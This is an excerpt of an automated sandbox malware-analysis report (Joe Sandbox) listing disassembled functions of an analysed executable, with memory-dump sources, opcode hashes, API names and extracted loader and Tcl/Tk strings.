                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                      • Instruction ID: 208f89476cfd97f714ed7e29987acb30f00f47a1c8b6fe93b55039aac5071731
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B541B6A28097CA44EB7D992806046F8D6C0DF62FB0FD853B0DEB9533C6DD1D29A7C1A1
                                                                                                                                                                                                      Function 00007FF7FF599F10 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                      • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                      • Instruction ID: 7c266a0991bd3714d88a499676272b84a680107bf29d3a887120bfdbb59e4f0a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04412832714A9582EF18DF6ADA141A9F7A1FB48FD0B899132DE2D97B98DF3DC4418340
                                                                                                                                                                                                      Function 00007FF7FF598154 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                      • Instruction ID: 61f5a816dc5e8c80989272e4c13adbced7c5efae7552ce0fb6851e80ead4d874
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE310732B08BC281E768AF2164401BEB6D4AB85BD0F944338EA7D57BD5DF3CD0128358
                                                                                                                                                                                                      Function 00007FF7FF5A95E0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                      • Instruction ID: dc107afdae6819cef54890c4cdb8010b0e024a7de6f8b7b70aaa749db93f3a04
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF0C8717182958ADB98AF6CB402A6977D0F7483C0F908239D6AD83B54CE3CC061CF64
                                                                                                                                                                                                      Function 00007FF7FF58D37C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                      • Instruction ID: 60c2a235a24caa31297177bedc691b255f07afc4922f824b69d497a4d7d9c409
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BA0012190D88AE1E744AB00A8A04A5A360FB51300B800232E03D420F4AE2CA414D2A0
                                                                                                                                                                                                      Function 00007FF7FF5876B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                      • API String ID: 199729137-3427451314
                                                                                                                                                                                                      • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                      • Instruction ID: 0444685bfb9bbad97c277504d2f2ae55207c9f8b04a974173d826a585a9dc325
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69027B24A4EB87A1EB14BB65B8105F4AAA1BF05755BD41235D87E032E0FF7CB568C2F0
                                                                                                                                                                                                      Function 00007FF7FF5881C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF589400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FF5845E4,00000000,00007FF7FF581985), ref: 00007FF7FF589439
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7FF5888A7,?,?,00000000,00007FF7FF583CBB), ref: 00007FF7FF58821C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582810: MessageBoxW.USER32 ref: 00007FF7FF5828EA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                      • API String ID: 1662231829-930877121
                                                                                                                                                                                                      • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                      • Instruction ID: c840423aa0d0a90424b34485ed5f33c9943444137dfb87d24c9494e46243a34a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC519411A19AC291FB50BB25E8516FAE291FF94781FC84231E93F876D5EE2CE504C7E0
                                                                                                                                                                                                      Function 00007FF7FF582180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                      • String ID: P%
                                                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                      • Instruction ID: 5208bd13e88c9471ebb121d1a79eb7c18ec6bb839ce31eb62f93fd72a425a48f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A51D626604BE186D7249F26A4181FAFBA1F798B61F404225EBEF43694DF3CD055DB20
                                                                                                                                                                                                      Function 00007FF7FF5880B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                      • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                      • API String ID: 3975851968-2863640275
                                                                                                                                                                                                      • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                      • Instruction ID: a689ae1f0651379f4a7ca02aaceeab5828097c6693eed5471cac9fc214f9df41
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E221B725B09AC282E7416B7AA8441B9E751FF88B91FD84331DE3D473E4DE2CD5A1C3A1
                                                                                                                                                                                                      Function 00007FF7FF596300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: -$:$f$p$p
                                                                                                                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                                                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                      • Instruction ID: 1f306e519a96028b74d20d62fd11342280a941ce0d22d7ee19ee4a040a80e00d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58126D62A0C1C386FB38BB14D1546F9B695FB41750FD44235E6BA47AC4DF3CE9888BA0
                                                                                                                                                                                                      Function 00007FF7FF591038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                      • Instruction ID: ee94746ab76c09dc172229fd4a4af167e040987f4deffd1534f6486bc1e4e9cf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03125022E0C1E386FF38BA15E0546F9E661EB40754FD84235E6B947AC4DF7CE4808BA4
                                                                                                                                                                                                      Function 00007FF7FF581050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                      • Opcode ID: cac4820a7b744c2a3ed9884ecbea95852d55726b30acd907294baaf881276d8e
                                                                                                                                                                                                      • Instruction ID: 130b96ae9817b0e558ee9e765f441cb743f971aefdf0deaf4aa8a81fee3a9b7f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cac4820a7b744c2a3ed9884ecbea95852d55726b30acd907294baaf881276d8e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80415721A0869286EB14FB12A8406FAE794BF45B84FC44632ED7D077D6DE3CE546C7E0
                                                                                                                                                                                                      Function 00007FF7FF581470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                      • Opcode ID: 36a1ab3064973414bc50407d7382ece4e743d8df21bb13a2de201f3127f22220
                                                                                                                                                                                                      • Instruction ID: 5b6b33ed697c359332aefdb7fbe7964c5e1acf495db062e22284dca0a21d8ac2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36a1ab3064973414bc50407d7382ece4e743d8df21bb13a2de201f3127f22220
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC413922A086C295EB10BB22A4405F9A390BF45794FC44A32ED7D07BE5DE3CE555CBE0
                                                                                                                                                                                                      Function 00007FF7FF58EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                                                      • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                      • Instruction ID: c0b18e7f5c9e2c966aeb331c1505eb08ddfd7a0d8cbffe6cc55aafa00969d228
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD17C32A0879187EB20ABA5D4403EDB7B0FB45798F900235EA6D57BD6DF38E484C790
